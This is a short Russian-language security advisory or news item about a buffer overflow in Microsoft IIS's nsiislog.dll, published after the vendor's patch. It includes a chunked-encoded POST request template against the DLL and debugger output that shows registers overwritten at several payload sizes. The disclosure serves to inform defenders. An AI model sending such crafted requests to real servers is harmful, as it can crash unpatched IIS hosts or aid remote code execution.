На прошлой неделе Microsoft выпустила патч, в котором устраняется уязвимость nsiislog.dll. Сейчас раскрываются подробности обнаруженной уязвимости. 

Уязвимость обнаружена в пути, которым nsiislog.dll обрабатывает поступающие запросы. Атакующий может послать специально сформированный запрос серверу, чтобы аварийно завершить работу IIS Web сервера. 

Уязвимость связанна с переполнением буфера в nsiislog.dll при регистрации некоторых некорректных запросов. Посылая chunked encoded POST к nsiislog.dll, можно вызвать переполнение буфера. Пример: 

POST /scripts/nsiislog.dll HTTP/1.1
Transfer-Encoding: chunked
PostLength
PostData
0
Using Size: 121
Connecting….Sending Buffer….

78003F25 dec dword ptr [ecx+0ACh]

7800F5ED dec dword ptr [esi] ESI = 58585858

Using Size: 510
Connecting….Sending Buffer….

77FC8FE1 mov dword ptr [ecx],eax EAX = 58585858
ECX = 58585858

Using Size: 5000
Connecting….Sending Buffer….

40F01DCC rep movs dword ptr [edi],dword ptr [esi]

77FC8FE1 mov dword ptr [ecx],eax EAX = 58585858
ECX = 58585858

Уязвимость может использоваться для выполнения произвольного кода на уязвимой системе.



Оставить мнение